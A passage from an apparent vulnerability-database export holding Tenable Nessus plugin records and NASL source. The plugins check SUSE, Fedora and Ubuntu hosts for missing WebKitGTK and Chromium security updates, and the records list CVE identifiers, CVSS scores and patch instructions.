reference:\"webkit2gtk3-minibrowser-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:07", "description": "This update for webkit2gtk3 to version 2.24.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292, CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-11070 (bsc#1132256).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-06T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:1137-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-1137-1.NASL", "href": "https://www.tenable.com/plugins/nessus/124645", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:1137-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124645);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:1137-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.24.1 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292,\nCVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518,\nCVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,\nCVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559,\nCVE-2019-8563, CVE-2019-11070 (bsc#1132256).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11070/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6201/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6251/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-7285/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-7292/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8503/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8506/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8518/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8523/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8524/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8535/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8536/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8551/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8558/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8559/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8563/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20191137-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4b8f79e\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-1137=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-1137=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-1137=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T15:05:39", "description": "Security fix for CVE-2018-17478 CVE-2018-17479. Update to 70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : chromium (2018-fd194a1f14)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-17478", "CVE-2018-17479", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-FD194A1F14.NASL", "href": "https://www.tenable.com/plugins/nessus/120933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fd194a1f14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120933);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-17478\",\n \"CVE-2018-17479\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-fd194a1f14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 28 : chromium (2018-fd194a1f14)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2018-17478 CVE-2018-17479. Update to\n70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462\nCVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466\nCVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470\nCVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475\nCVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd194a1f14\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17479\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"chromium-70.0.3538.110-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:24", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-01T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : WebKitGTK&#43; vulnerabilities (USN-3635-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3635-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3635-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109468);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\");\n script_xref(name:\"USN\", value:\"3635-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : WebKitGTK&#43; vulnerabilities (USN-3635-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3635-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit JIT Exploit for iOS 7.1.2');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/01\");\n 